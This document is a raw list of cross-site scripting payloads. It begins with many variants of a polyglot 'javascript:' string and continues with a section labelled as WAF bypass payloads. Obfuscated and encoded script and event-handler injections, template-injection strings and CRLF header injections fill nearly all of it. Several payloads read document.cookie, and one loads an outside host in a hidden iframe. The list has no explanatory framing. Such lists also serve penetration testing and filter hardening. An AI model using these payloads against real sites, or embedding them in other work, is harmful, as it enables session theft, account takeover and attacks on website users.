jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

\x3csVg/\x3e">

\x3csVg/\x3e'>

\x3csVg/\x3e>

 

click me

click me

 

<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e';

var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e";

String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e`;

var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e/;

//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e*/

 

//\x3csVg/\x3e

javascript:"/*'/*`/*-->

javascript:"/*'//`//\"///<i

javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"><svg/oNloAd=alert()>\";alert()//

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

'''jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk={callback} )//%0D%0A%0d%0a//\x3csVg/\x3e''',

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

” *

@im\port'\ja\vasc\ript:alert("XSS")';

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

avascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//

javascript:'/*`/*'/*"/*\"/*//

javascript:new%20Function`al\ert\`1\``;

javascript:"/*\"/*'/*`/*--><

javascript:"/*'/*`/*-->

javascript:"/*'/*`/*-->

#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e

#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e

<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e

jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/\\x3e

jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/\\\\x3e

jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/\\\\\\\\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//

javascript:"/*'/*`/*-->

javascript:"/*'/*`/*\" /*

javascript:"/*\"/*`/*' /*-->

javascript:`//"//\"//`

javascript:`/*\"/*-->`

javascript:"/*'//`//\"///

javascript:"/*`/*\"/*'/*/*

javascript:`\"///"//</`

javascript:`\"///"//</`

javascript:/*`//'//\"//-->/

javascript:/*"//'//`//\"//-->//

javascript:/*-->'//"//`//\"///*

javascript:/*"/*'/*`/*\"/*-->/*

javascript:/*"/*'/*\"/*`/*-->//

javascript:/*"/*`/*'/*\"/*--> /*

javascript:"/*'//`//\"//--><alert()<

javascript:alert()"//\"//'//`//-->//

javascript:/*"/*`/*'/*\"/*<

javascript:"/*`/*\"/*' /*<

javascript:/*-->\"[`["[']<///

javascript:"/*\"/*'/*`/*--><

javascript:/*"/*`/*'/*\"/*-->< /**/alert()//<

javascript:"/*\"/*'/*--></*` /*<

javascript:"/*'/*\"/*` /**/alert()//-->alert()

javascript:/*"/*`/*'/*\"/*-->*/ alert()//<

javascript:`/*javascript:/*`/*\"/*'/*"/*<

javascript:alert()//"/*`/*'/*\"/*-->*/ alert()//<alert()<

javascript:alert()//'//"//\"//-->`//*/ alert();//<

javascript:/*"/*\"/*`/*'/**/ (alert())//<

javascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//

javascript:/*`/*'/*'/*"-/*\"/**/ alert()//>--><

javascript:'/*`/*'/*"/*\"/*//

javascript:alert()//-->*///\"//`//'//"//> alert()//

javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//-->alert()

javascript:/*"/*'/*`/*\"/**/ alert()//*--><

javascript:alert()//\"//`//'//"//-->">*/ alert()//

javascript:alert()//*-->*`/*'/*"/*\"/*/**/ alert()//

jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//

javascript:alert()//'//"//`//>--><\">alert()//*/ alert()//

javascript:alert()//\ /*-->alert`;alert();`*/alert()//\";alert()//

javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//-->alert()

javascript:alert();//\" alert();/*`/**/(/**/alert())//alert()<>

javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//-->alert() alert()//

javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--> alert(1)//

javascript:alert()//`;alert()`';alert()//\";alert();//"//-->*/ alert()//*

javascript:alert()//alert()-->\";alert()//";alert()//';alert()//alert()` alert()//*/alert()/*

javascript:alert();//\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--><!--

javascript:/*-->">">alert()+\"; alert()//

javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//-->alert(1) alert(1)//

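WAF Bypass payloads by coffinxp (the entries that follow mostly vary letter case, URL / HTML-entity / Unicode-escape encoding, and the choice of tag or event handler around the same alert/confirm/prompt probes, so they exercise how a filter normalises input rather than which keywords it lists):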

 

">"@yourdomain

013371337;ext=

  

"@gmail.com

  

<””>

 

%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e

%3Csvg%20onload=alert(%22MrHex88%22)%3E

'">

">\]

%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

">

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

javascript:var a="ale";var b="rt";var c="()";decodeURI("Click meHvita")

ClickMe

window.valueOf=alert;window%2B1

#javascript:alert(1)

  

">XSS here<!--

1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=

1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=

"><+=()>

- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")

'"><img src=x onerror=alert("xss!")>.pdf

  

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

"><track/onerror='confirm`1`'>

%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('‏0f')">

<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>

<sCrIpT>(function(){var a=[97,108,101,114,116];var

b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>

<DiV sTylE="WidTH:100&#37;;HeIgHt:100vH&#59;" oNpOINteROvEr="var _0x1abc=['\x63','\x6F','\x6E','\x73','\x74','\x72','\x75','\x63','\x74','\x6F','\x72'];var _0x2bcd=['\x61','\x6C','\x65','\x72','\x74','\x28','\x64','\x6F','\x63','\x75','\x6D','\x65','\x6E','\x74','\x2E','\x64','\x6F','\x6D','\x61','\x69','\x6E','\x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>

<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>

<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>

<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>

<svg onload="alert(1)"></svg>

jaVasCript:/*-/*`/*\`/*'/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*&#x252f;&#x252a;prompt(1)&#x252f;&#x253b;/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//

<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x>

  

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

 

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

<math><x xlink:href=javascript:confirm`1`>click

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

<svg onload=alert&#0000000040document.cookie)>

JavaScript://%250Aalert?.(1)//

'/*\'/*"/*"/*`/*\`/*%26apos;)/*<!-->

 

k

 

javascript:%ef%bb%bfalert(XSS)

  

">

"><track/onerror='confirm\%601\%60'>

 

"`'>\xE2\x80\x87javascript:alert(1)

 

"`'>\xE2\x80\x87javascript:alert(1)

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

"\/>

"><track/onerror='confirm\%601\%60'>

 

#(1)

 

#(1)

 

"'`//>

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

location=%27javasCript:alert\x281\x29%27

';k='e'%0Atop['al'+k+'rt'](1)//

"';k='e'%0Atop['al'+k+'rt'](1)//"

    

'"/>alert(document.domain)<%2fscript>.css

">

/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)

login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain

'>

{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}

{{$emit.constructor`alert(1)`()}}

{{$eval.constructor('alert(1)')()}}

{{$on.constructor('alert(1)')()}}

{{$on.constructor('alert("CodePrefer")')()}}

$("script(2)")

$ prompt(1)alert(1)

'-alert(1)-'

'<00 foo="XSS-CLick00>--%20/

<[%00]img onerror=alert(1) src=a>

%00">alert(1);

%00alert(1)

///%01javascript:alert(document.cookie)/

%09Jav%09ascript:alert(document.domain)

/%09/javascript:alert(1)

/%09/javascript:alert(1);

%0A%0d+select+user+from+dual+%0A%0D

%'});%0aalert(1);%20//

{{0[a='constructor'][a]('alert(1)')()}}

%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)

%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A

0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A

%0d%0a%0d%0aalert(document.domain)

">%0D%0A%0D%0A

">%0D%0A%0D%0A

>%0D%0A%0D%0A

%0d%0a%20

%0d%0a%20

%0d%0a%20

%0d%0a%20">

%0d%0a%20">

%0d%0a%20javascript:alert(1)

%0d%0a%20alert(1)

%0d%0a%20prompt(document.domain)

%0d%0a%20">

%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--

<!--*/!'*/!>%0D<svg/onload=confirm'1'//

_0x68087f:alert(0x1);

0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;

0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>

')}, 1000); alert('xss')://

')}, 1000);alert("xss");//

10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>

11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1

1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=

123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--

123')});alert(1);(()=>{('

12&<script>alert(123)</script>=123

1337 '><marquee onstart="[cookie].find(confirm)">

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

1"><%3Csvg onload=alert%28document.cookie%29>'

[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()

";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="

¼script¾alert(¢XSS¢)¼/script¾

1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e

1'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

'1/-alert\5023\51/';

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>

[1].find(alert)

[1].find(confirm)

1'"><img/src/onerror=.1|alert``>

[1].map(alert) or (alert)(1)

#1&"><script>alert(1)</script>=1

1&"><script>alert(1)</script>=1

1"-->

1

1')"<!--><Svg OnLoad=(confirm)(1)<!--

1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>

1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>

1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>

1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

%20%3Cimg%20src=1%20onerror=alert(1)%3E

%20<body onload=alert("bingo")>

/";%20confirm(1);%20//

%20<img src=1 onerror=alert(1)>

%20<img/src/onerror=alert(coffinxp`)>

%20"><img src=q onerror=alert(1)>

%20"><img src=x onerror=prompt(document.domain);>

%20javascript:alert(1)

%20<script>alert(1)</script>

%20<script>prompt(document.domain)</script>

%20"><svg onload=alert(1)>

%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f

%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E

%22%27%3E'><script>alert(2);</script>

%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--

%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e

%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--

%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick

%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E

#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E

%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E

%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E

%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1

%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E

%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)

%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!

%22%3E'><script>alert(2);</script>

%22-[9].every(alert)-%22//

%22-alert('XSS')-%22

%22})))}catch(e){alert(document.domain);}//

%22-confirm(1)-%22

%22onauxclick=alert`xss`+a

%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>

~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"

%2500%27onmouseover=%27window.stop();alert(document.domain)%27

//%250Aalert?.(1)//

%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E

%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E

%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520

%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527

%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520

/%2527)%253B%2520alert(document.cookies)%253B%252F%252F

%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E

%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT%253E

%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527XSS%2520here%2521%2527%2529%253C%252Fscript%253E

%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E

%253cimg%20onerror=alert(1)%20src=a%253e

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E

%253cscript%253ealert(1)%253c/script%253e

%253Cscript%253Ealert(1)%253C/script%253E

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

%253Cscript%253Ealert('XSS')%253C/script%253E

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%26%2302java%26%23115cript:alert(document.domain)

%26%23x2f%3B%26%23x2f%3Br4y.pw

#'%26%26'javascript:alert%25281%2529//

'%26%26'javascript:alert%25281%2529//

%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B

%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

%26#x6c;t;\\x73cript&#62;\\u0061lert(1)%26#x6c;t;/\\x73cript&#62;

%27%09);%0d%0a%09%09[1].find(alert)//

%27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//

%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'

%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E

%27%3E'><script>alert(2);</script>

%27x%27onclick=%27alert(1)

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74

%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E

"%2F><%2Fscript><script>alert%28document.cookie%29<%2Fscript>

%2sscript%2ualert()%2s/script%2u

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

&#34;&#62;<h1/onmouseover='\u0061lert(/AmoloHT/)'>

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

#&#39;-alert(1)-&#39;

&#39;-alert(1)-&#39;

"%3balert`1`%3b"

%3balert`1`%3b

%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E

%3C%5K/onpointerenter=alert(1)>

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7

#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E

%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E

%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20me%3C%2Fbutton%3E

%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E

%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C%2Fdiv%3E

%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E

%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E

%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E

%3Chtml%0aonmouseOver%0a=%0a(prompt)``//

%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E

"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e

%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E

%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E

%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E

%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E

%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E

%3Cimg%20src=x%20onerror=alert(1)%3E

%3Cimg%20src=xx%20onerror=alert(1)%3E

%3cimg onerror=alert(1) src=a%3e

%3Cimg src='null' onerror=alert('spyerror')%3E

%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E

%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E%22%3E

%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+

